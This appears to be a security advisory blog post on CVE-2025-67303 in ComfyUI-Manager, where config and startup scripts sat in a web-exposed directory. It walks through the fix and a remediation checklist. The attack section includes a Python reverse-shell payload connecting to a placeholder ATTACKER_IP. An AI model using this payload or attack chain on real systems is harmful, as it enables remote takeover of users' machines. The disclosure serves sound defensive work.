ComfyUI-Manager: When 'Default' Means 'Remote Code Execution'

In the world of Generative AI, ComfyUI has become the de facto standard for power users. It's node-based, flexible, and lets you pipe stable diffusion workflows together like a digital plumber. To manage the chaos of custom nodes and models, everyone installs ComfyUI-Manager. It's the 'apt-get' of the Comfy ecosystem, handling updates, model downloads, and dependencies.

But here is the problem: ComfyUI is often run by data scientists and hobbyists, not DevSecOps engineers. It's frequently launched with --listen 0.0.0.0 to access the UI from a laptop or mobile device while the heavy lifting happens on a desktop with a beefy RTX 4090. That powerful machine is now exposed to the network.

CVE-2025-67303 isn't a complex buffer overflow or a heap grooming masterpiece. It's a design tragedy. The Manager extension decided to store its own vital organs—configuration files and startup scripts—in a directory that the ComfyUI web server happily serves to anyone who asks. It’s the digital equivalent of storing your house keys in a clear glass box taped to your front door.

The vulnerability stems from Insecure Storage combined with Improper Access Control. In versions prior to 3.38, ComfyUI-Manager stored its persistent data in ComfyUI/user/default/ComfyUI-Manager/. If you know anything about ComfyUI's architecture, the user/ directory is designed to be accessible. It’s where your generated images go. It’s where your workflows live. The web server exposes these paths so the frontend JavaScript can load them.

Unfortunately, the Manager didn't just store benign JSON blobs there. It stored:

• config.ini: Controlled the security_level. This setting determines if you can install arbitrary pip packages or interact with the file system.
• startup-scripts/: A folder containing scripts executed during the initialization phase.
• pip_overrides.json: Rules for package management.

Because ComfyUI’s API endpoints (like /view or /input) didn't differentiate between "this is a cool cat picture you generated" and "this is the security configuration for the server," an attacker could use standard API calls to overwrite these files. There was no magic byte validation, no authentication on the directory (unless you set up a reverse proxy with auth, which 90% of users don't), and no separation of duties.

The fix was substantial but conceptually simple: move the sensitive data out of the line of fire. The developers introduced a migration routine in commit e44c5cef58fb4973670b86433b9d24d077b44a26. They leveraged a new "System User Protection API" introduced in ComfyUI core v0.3.76.

Here is a look at the logic change. The critical move was shifting from the exposed default user directory to a protected __manager directory.

The Vulnerable Path Logic (Simplified):

# Old sensitive path - directly accessible via web
manager_path = os.path.join(comfy_path, "user", "default", "ComfyUI-Manager")

The Fix (Migration & Protection):

# New protected path logic
if protection_api_available:
    # Move data to hidden directory '__manager' which is blocked by the server
    new_path = os.path.join(comfy_path, "user", "__manager")
    
    # Check security level during migration
    if config.get("security_level") in ["weak", "normal-"]:
        print("[ComfyUI-Manager] WARNING: Security level reset to normal during migration")
        config["security_level"] = "normal"
        save_config(config)

[!NOTE] The patch doesn't just move the files. It actively sanitizes the configuration. If it detects you were running in weak mode (which an attacker might have set), it forcibly resets you to normal. It also blocks startup scripts entirely if the core ComfyUI version is too old to support the protected paths.

Exploiting this is terrifyingly straightforward. We don't need to craft shellcode; we just need to use the application's features against itself. The attack chain relies on the fact that if we can modify config.ini, we can lower the shields, and if we can modify startup-scripts, we can execute code.

Attack Diagram

The Steps

1. Downgrade: The attacker sends a request to overwrite config.ini. They set security_level=weak. This disables checks that might otherwise prevent the execution of arbitrary scripts or the installation of dangerous pip packages.
2. Inject: The attacker overwrites startup-scripts/install-scripts.txt. This file is parsed by the Manager to run setup tasks.

   # Example Payload injected into the script file
   import socket,subprocess,os
   s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   s.connect(("ATTACKER_IP",1337))
   os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
   p=subprocess.call(["/bin/sh","-i"])

3. Execute: The next time the server reloads (which can sometimes be forced via the UI or happens naturally during workflow changes), the script executes. The attacker now has a shell as the user running ComfyUI.

The impact here is Critical with a capital C. ComfyUI isn't usually running in a hardened container with dropped privileges. It's often running directly on the host OS to maximize GPU throughput, frequently with access to the user's home directory.

Successful exploitation grants:

• Full System Access: RCE means the attacker controls the machine.
• Hardware Hijacking: Your $2,000 GPU is now mining Monero for someone else.
• Data Exfiltration: Private fine-tuned models (LoRAs), generated images, and potentially other sensitive data on the host machine are up for grabs.
• Lateral Movement: Since these are often powerful workstations inside a home or corporate network, they make excellent beachheads for pivoting to other devices.

While the NVD CVSS score is 7.5 (Integrity focused), practically speaking, this is a 9.8 scenario if the instance is exposed to the internet.

The mitigation is simple: Update immediately. You need to be on ComfyUI-Manager v3.38 or higher.

However, updating alone might not be enough if you've already been compromised. The patch includes a migration that moves your data, but it won't necessarily delete a backdoor installed elsewhere in your system.

Remediation Checklist:

1. Update Core: Ensure ComfyUI itself is v0.3.76+. The Manager's fix relies on the Core's new API protections.
2. Update Manager: Pull the latest v3.38+ version.
3. Check for Residuals: Look in user/__manager/.legacy-manager-backup/. If you see a startup-scripts folder populated with files you don't recognize, you were likely targeted.
4. Network Hygiene: Stop running --listen 0.0.0.0 naked. Put it behind a VPN (Tailscale/Wireguard) or a reverse proxy with Basic Auth (Nginx/Apache).